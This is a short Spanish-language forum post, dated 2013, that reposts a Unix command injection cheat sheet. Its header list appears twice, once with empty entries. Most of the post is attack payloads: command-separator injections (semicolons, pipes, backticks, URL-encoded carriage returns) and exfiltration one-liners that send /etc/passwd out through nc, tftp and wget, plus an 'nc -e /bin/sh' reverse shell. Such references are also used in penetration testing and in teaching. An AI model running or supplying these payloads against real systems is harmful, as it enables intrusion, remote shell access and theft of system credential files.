Command Injection Cheat Sheet (Like-Unix)
Publicado: 18 Mar 2013, 03:48
Like-Unix Command Injection Cheat Sheet
Un corto pero util cheat sheet de comman injection para sistemas like-unix, recordar que "blah" es nuestro comando a inyectar.
Executing Commands
Seperating Commands:
PIPE:
PIPEZ:
AND:
OR:
OR:
Backtick:
Background:
Getting Files / Data
FTP:
NC:
NC:
TFTP:
WGET:
[Enlace externo eliminado para invitados]
Un corto pero util cheat sheet de comman injection para sistemas like-unix, recordar que "blah" es nuestro comando a inyectar.
Executing Commands
Seperating Commands:
Código: Seleccionar todo
blah;blah2
Código: Seleccionar todo
blah | blah2
Código: Seleccionar todo
blah ^ blah2
Código: Seleccionar todo
blah && blah2
Código: Seleccionar todo
FAIL || X
Código: Seleccionar todo
blah%0Dblah2%0Dblah3
Código: Seleccionar todo
`blah`
Código: Seleccionar todo
`blah & blah2`
FTP:
Código: Seleccionar todo
Make a new text, and echo and then redirect to FTP
Código: Seleccionar todo
nc -e /bin/sh
Código: Seleccionar todo
echo /etc/passwd | nc host port
Código: Seleccionar todo
echo put /etc/passwd | tftp host
Código: Seleccionar todo
wget --post-file /etc/passwd